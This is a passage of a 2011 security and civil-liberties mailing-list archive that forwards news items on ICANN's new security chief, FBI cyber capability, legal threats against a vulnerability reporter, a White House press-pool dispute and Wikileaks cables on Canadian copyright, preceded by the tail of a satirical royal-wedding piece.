a mobile flying wedge ahead of her, clearing a path for the fugitive future princess to escape down. Prince William will then have a limited time, the subject of tense negotiations between Clarence House and security chiefs, in which the path behind Ms Middleton will be kept open for him to go after her, after which the mobile protective cordon will close again at the Abbey end due to lack of manpower and the Prince will have let his bride slip through his fingers. If Wills reacts fast enough, however, he will be able to chase after his fleeing fiancee for just under half a mile. "Clarence House wanted a full mile," says our source. "But we said come on, play fair, she's in her wedding dress and there has to be some limit on the overtime budget." If the Prince fails to intercept Ms Middleton over that distance, the security team will decide that no on-the-spot reconciliation is possible and a strategically positioned taxi, driven by an undercover SAS operative and unobtrusively escorted by several unmarked police cars, will opportunely pull up to carry the escaping ex-future-princess to safety. On the other hand if Wills manages to come up with Kate he will be allowed to attempt to persuade her to return with him for a limited period. "We got Clarence House to cut that by a few minutes by agreeing they could put ringers in the crowd to shout stuff like 'Go on love, give him a kiss'," reveals our source. It is understood that royal officials are hoping that there will be no need for Operation Pumpkin, but anticipate a significant boost to the wedding's TV ratings if it does go into effect. We asked our source what plans were in place should Wills, rather than Kate, attempt to flee the wedding. "Come off it," he said. "We only plan for things that make sense. He doesn't want to be back on the dating scene wearing a rug, does he?" ? From rforno at infowarrior.org Fri Apr 29 13:21:53 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 29 Apr 2011 14:21:53 -0400 Subject: [Infowarrior] - ICANN taps DefCon founder for top security spot Message-ID: ICANN taps DefCon founder for top security spot /v3-uk/news/2046681/icann-taps-defcon-founder-security-spot 29 Apr 2011, Shaun Nichols , V3 http://www.v3.co.uk/print_article/v3-uk/news/2046681/icann-taps-defcon-founder-security-spot The Internet Corporation for Assigned Names and Numbers (ICANN) has named Jeff Moss as its new chief security officer. A security expert and respected member of the hacking community, Moss is best known for his roles in founding the DefCon and Black Hat security conferences. He has also worked in advisory positions for the US Department of Homeland Security. The appointment of Moss will bring to ICANN a security head who is well-versed in the attitudes and techniques which have driven research in both security intrusions and detections in recent years. The hiring also comes at a time when ICANN and other internet governance groups are working to roll out security measures such as DNSSEC. "I can think of no one with a greater understanding of the security threats facing Internet users and how best to defend against them than Jeff Moss," said ICANN president and chief executive Rod Beckstrom. "He has the in-depth insider's knowledge that can only come from fighting in the trenches of the on-going war against cyber threats." The hiring is also earning praise within the security community. Dave Marcus, a DefCon veteran and head of research and communications for McAfee Labs, hailed the move as "a great appointment" for ICANN. "They are bringing in someone who has an understanding of it from a completely different perspective," Marcus told V3.co.uk. "He understands how the internet can be used in both positive and negative ways, and up until now they have not had a positive approach to deal with things like cyber crime." ICANN said that Moss will begin working with the group on 29 April at its offices in Washington, DC. From rforno at infowarrior.org Fri Apr 29 17:41:41 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 29 Apr 2011 18:41:41 -0400 Subject: [Infowarrior] - DOJ: FBI digital counterintelligence weakened by focus on child porn Message-ID: DOJ: FBI digital counterintelligence weakened by focus on child porn Cyberattacks are at an all time high; FBI spends twice as much effort fighting porn By Kevin Fogarty 1 comment http://www.itworld.com/security/160701/doj-fbi-cyber-security-largely-incompetent-obsessed-child-porn April 29, 2011, 11:35 AM ? Despite its growing digital surveillance capabilities and increasing responsibility for investigating and countering cyber attacks on the U.S., the FBI's core cyber security division turns out to be basically incompetent, according to a critical report from the Dept. of Justice. [PDF] Part of the reason is that the 14 agencies that share some responsibility for online counter-espionage don't share information well. Another contributor is the lack of effective pressure from top managers to get agents trained in national-security intrusion topics and tactics. Most of the reason is that the FBI spends twice as much effort investigating child porn as it does attempts by foreign governments to attack U.S. facilities or steal information that would damage U.S. national security, the report found. To put that in perspective, the number of foreign attacks on the U.S. increased 40 percent between 2007 and 2008, according to the report, whose data are pretty old for such a sensitive topic. An April study from McAfee showed 80 percent of utilities in 14 countries had been attacked during the previous year, an increase of almost 50 percent compared to the year before. Attacks ranged from distributed denial of services to intrusions to remove data to intrusions that attempted to take control of the utility's internal IT systems. And that's just among civilian-run utility companies. State Dept. documents released through WikiLeaks this month showed that years-long cyberattacks launched by the Chinese military had netted "terabytes" of sensitive data ranging from names and passwords that would give access to State Department computers, to the design of major weapons systems. The "Byzantine Hades" attacks ? and others coming from Russia and other unfriendly powers ? represent a new state of cyberwar the U.S. is not yet prepared to fight. The attacks have been so successful "we have given up on the idea we can keep our networks pristine," according to Stewart Baker, a former senior cyber-security official at the U.S. Department of Homeland Security and National Security Agency. The focus has shifted instead to more sophisticated efforts to detect and counter intrusions as they're made. Unfortunately, those are exactly the kinds of skills the FBI cyber squads lack and the kind of crime they don't have the time or resources to investigate. Of 36 agents with cybersecurity responsibilities the DOJ tested ? from 10 of the agency's 56 field offices, each of which has at least one "cyber squad" ? only 23 told investigators they had the training to investigate national security intrusions. The other 13 "lacked the networking and counterintelligence expertise to investigate national security intrusion cases." Five said they were completely unqualified to investigate national security intrusions effectively, the report said. In 2007 the FBI created a separate career path for digital security investigators called the Cyber Career Path, which includes a four-stage training plan covering 12 core courses and a set of elective courses agents can use to develop a specialty. The agency's habit of moving agents to new offices or new assignments every two or three years to expand their skills or experience makes completing that training difficult, the report concluded. So does a generally inconsistent focus on both online counter-espionage and giving agents either the training or time to build experience in investigating it. Top FBI managers are much more comfortable with agents trained to track down domestic hackers and breaking down doors than they are investigating or countering serious online attacks from overseas. The report ? some information in which was blacked out to avoid releasing sensitive or top secret information to which the public should not have access ? included the total number of agents who had completed all 12 courses as of June, 2010. The number was the only part of the paragraph explaining the program that was redacted. Online espionage isn't the FBI cyber squads' only responsibility, however. In 2009, 19 percent of the cyber agents worked on national security intrusion investigations, while 31 percent worked on non-spy-related digital crimes and 41 percent investigated online child porn. That's not to say child porn and domestic, non-national-security related cybercrime should not be investigated. When you're losing terabytes of sensitive data to foreign governments who can walk freely through your most secure computer systems, however, maybe it's time to reconsider your priorities. Maybe shift a few agents away from the wankers and point them toward the enemy? From rforno at infowarrior.org Fri Apr 29 20:02:43 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 29 Apr 2011 21:02:43 -0400 Subject: [Infowarrior] - Legal goons threaten researcher for reporting security bug Message-ID: <06889905-B10B-4FC8-801F-117207502BCA@infowarrior.org> Legal goons threaten researcher for reporting security bug When vuln disclosures are outlawed... By Dan Goodin in San Francisco ? Get more from this author Posted in Security, 29th April 2011 23:12 GMT http://www.theregister.co.uk/2011/04/29/security_researcher_threatened/ A German software company has threatened legal action against a security researcher who privately reported a critical vulnerability in one of its programs, Dark Reading reports. Legal goons from Magix AG sent a nasty gram to a researcher who goes by ?Acidgen? after he reported the stack buffer overflow in the company's Music Maker 16. According to the report, Acidgen alerted Magix representatives to the bug in several emails that also included proof-of-concept code that forced the Windows calculator to open, indicating the flaw could be exploited to execute malicious code on a victim's computer. Acidgen also provided suggestions for fixing the flaw, Dark Reading said. He also told the representatives he planned to disclose vulnerability details publicly once a patch was released. That's when things got ugly. ?MAGIX does not appreciate that you are intending to publicly release the Exploit and to cause irreparable harm,? a company attorney wrote. ?As you maybe [sic] aware it is illegal to release software which is intended to commit computer sabotage (e.g. Sec. 202C I No. 2 German Criminal Law). In addition this announcement together with your offering to have the vulnerability fixed by your company may be considered as an attempted extortion.? The letter said Magix would ?enter into all necessary and appropriate legal steps? and to ?inform manufacturers of antivirus software that there might be a new virus based on your code.? Germany enacted a draconian hacker law in 2007 that also criminalizes the creation or possession of dual-use security tools. ? From rforno at infowarrior.org Fri Apr 29 21:33:53 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 29 Apr 2011 22:33:53 -0400 Subject: [Infowarrior] - WH in press intimidation flap Message-ID: <18EA7ABC-9B42-4DF0-9C8D-697EBA6E9DB9@infowarrior.org> Update: Chronicle responds after Obama Administration punishes reporter for using multimedia, then claims they didn't http://www.sfgate.com/cgi-bin/blogs/bronstein/detail?entry_id=87978&tsp=1 Update: In a pants-on-fire moment, the White House press office today denied anyone there had issued threats to remove Carla Marinucci and possibly other Hearst reporters from the press pool covering the President in the Bay Area. Chronicle editor Ward Bushee called the press office on its fib: Sadly, we expected the White House to respond in this manner based on our experiences yesterday. It is not a truthful response. It follows a day of off-the-record exchanges with key people in the White House communications office who told us they would remove our reporter, then threatened retaliation to Chronicle and Hearst reporters if we reported on the ban, and then recanted to say our reporter might not be removed after all. The Chronicle's report is accurate. If the White House has indeed decided not to ban our reporter, we would like an on-the-record notice that she will remain the San Francisco print pool reporter. I was on some of those calls and can confirm Ward's statement. Messy ball now firmly in White House court. ----- The hip, transparent and social media-loving Obama administration is showing its analog roots. And maybe even some hypocrisy highlights. White House officials have banished one of the best political reporters in the country from the approved pool of journalists covering presidential visits to the Bay Area for using now-standard multimedia tools to gather the news. The Chronicle's Carla Marinucci - who, like many contemporary reporters, has a phone with video capabilities on her at all times -shot some protesters interrupting an Obama fundraiser at the St. Regis Hotel. She was part of a "print pool" - a limited number of journalists at an event who represent their bigger hoard colleagues - which White House press officials still refer to quaintly as "pen and pad" reporting. But that's a pretty Flintstones concept of journalism for an administration that presents itself as the Jetsons. Video is every bit a part of any journalist's tool kit these days as a functioning pen that doesn't leak through your pocket. In fact, Carla and her reporting colleague, Joe Garofoli, founded something called "Shaky Hand Productions" - the semi-pro, sometimes vertiginous use of a Flip or phone camera by Hearst reporters to catch more impromptu or urgent moments during last year's California gubernatorial race that might otherwise be missed by TV. The name has become its own brand; often politicians even ask if anyone from Shaky Hand will show at their event. For Carla, Joe and reporters at other Hearst newsrooms where Shaky Hand has taken hold, this was an appropriate dive into use of other media by traditional journalists catering to audiences who expect their news delivered in all modes and manners. That's the world we live in and the President of the United States claims to be one of its biggest advocates. Just the day before Carla's Stone Age infraction, Mr. Obama was at Facebook seated next to its founder, Mark Zuckerberg, and may as well have been wearing an "I'm With Mark" t-shirt for all the mutual admiration going back and forth. "The main reason we wanted to do this is," Obama said of his appearance, "first of all, because more and more people, especially young people, are getting their information through different media. And historically, part of what makes for a healthy democracy, what is good politics, is when you've got citizens who are informed, who are engaged." Informed, in other words, through social and other digital media where videos of news are posted. The President and his staffers deftly used social media like Twitter and Facebook in his election campaign and continue to extol the virtues and value. Except, apparently, when it comes to the press. So what's up with the White House? We can't say because neither Press Secretary Jay Carney nor anyone from his staff would speak on the record. Other sources confirmed that Carla was vanquished, including Chronicle editor Ward Bushee, who said he was "informed that Carla was removed as a pool reporter." Which shouldn't be a secret in any case because it's a fact that affects the newsgathering of our largest regional paper (and sfgate)and how local citizens get their information. What's worse: more than a few journalists familiar with this story are aware of some implied threats from the White House of additional and wider punishment if Carla's spanking became public. Really? That's a heavy hand usually reserved for places other than the land of the free. But bravery is a challenge, in particular for White House correspondents, most of whom are seasoned and capable journalists. They live a little bit in a gilded cage where they have access to the most powerful man in the world but must obey the rules whether they make sense or not. CBS News reporter, Mark Knoller, has publicly protested the limited press access to Obama fundraisers, calling the policy "inconsistent." "It's no way to do business," wrote Politico's Julie Mason, "especially [for] a candidate who prides himself on transparency." A 2009 blog by the White House Director of New Media states that "President Obama is committed to making his administration the most open and transparent in history." Not last week. Mason referred to the San Francisco St. Regis protest as "a highly newsworthy event" where "reporters had to rely on written pool reports..." Except, thanks to Carla's quick action with her camera, they didn't. I get that all powerful people and institutions want to control their image and their message. That's part of their job, to create a mythology that allows them to continue being powerful. But part of the press' job is to do the opposite, to strip away the cloaks and veneers. By banning her, and by not acknowledging how contemporary media works, the White House did not just put Carla in a cage but more like one of those stifling pens reserved for calves on their way to being veal. Carla cannot do her job to the best of her ability if she can't use all the tools available to her as a journalist. The public still sees the videos posted by protesters and other St. Regis attendees, because the technology is ubiquitous. But the Obama Administration apparently wants to give the distinct advantage to citizen witnesses at the expense of professionals. Why? Well, they won't tell us. Some White House reporters are grumbling almost as much as the Administration about Carla's "breaking the rules." I can understand how they'd be irritated. If you didn't get the video because you understood you weren't supposed to, why should someone else get it who isn't following the longstanding civilized table manners? The White House Press Correspondents' Association pool reporting guidelines warn about "no hoarding" of information and also say, "pool reports must be filed before any online story or blog." While uploading her video probably was the best way to file her report, Carla may have technically busted the letter of that law. But the guidelines also say, "Print poolers can snap pictures or take video. They are not obliged to share these pictures...but can make them available if they so choose." Then what guidelines is the White House applying here? Again, we don't know. What the Administration should have done is to use this incident to precipitate a reasonable conversation about changing their 1950's policies into rules more suited to 2011. Dwight Eisenhower was the last President who let some new media air into the room when he lifted the ban on cameras at press conferences in 1952. "We've come full circle here," Tom Rosenstiel, director of the Pew Foundation's Project for Excellence in Journalism told me today. "A newspaper reporter is being punished because she took pictures with a moving camera. We live in a world where there are no longer distinctions. The White House is trying to live by 20th century distinctions." The President's practice not just with transparency but in other dealings with the press has not been tracking his words, despite the cool glamour and easy conversation that makes him seem so much more open than the last guy. It was his administration that decided to go after New York Times reporter James Risen to get at his source in a book he wrote about the CIA. For us here in SF who went through the BALCO case and other fisticuffs with the George W. Bush Attorney General's prosecutors, this is deja vu. Late today, there were hints that the White House might be backing off the Carla Fatwa. Barack Obama sold himself successfully as a fresh wind for the 21st century. In important matters of communication, technology, openness and the press, it's not too late for him to demonstrate that. From rforno at infowarrior.org Sat Apr 30 18:25:49 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 30 Apr 2011 19:25:49 -0400 Subject: [Infowarrior] - Wikileaks Cables Show Massive U.S. Effort to Establish Canadian DMCA Message-ID: <7B5C6094-5D7E-46ED-AC57-E8D972971994@infowarrior.org> Wikileaks Cables Show Massive U.S. Effort to Establish Canadian DMCA Friday April 29, 2011 Wikileaks has released dozens of new U.S. cables that demonstrate years of behind the scenes lobbying by U.S. government officials to pressure Canada into implementing a Canadian DMCA. The cables include confirmation that Prime Minister Harper personally promised U.S. President George Bush at the SPP summit in Montebello, Quebec in 2008 that Canada would pass copyright legislation, U.S. government lines on copyright reform that include explicit support for DMCA-style digital lock rules, and the repeated use of the Special 301 process to "embarrass" Canada into action. In fact, cables even reveal Canadian officials encouraging the U.S. to maintain the pressure and disclosing confidential information. This post highlights some of the key cables. An earlier post discussed confirmation that public pressure delayed the introduction of a copyright bill in 2008 and a parallel post focuses on the linkages between CRIA and the U.S. government lobbying effort. < -- > http://www.michaelgeist.ca/content/view/5765/125/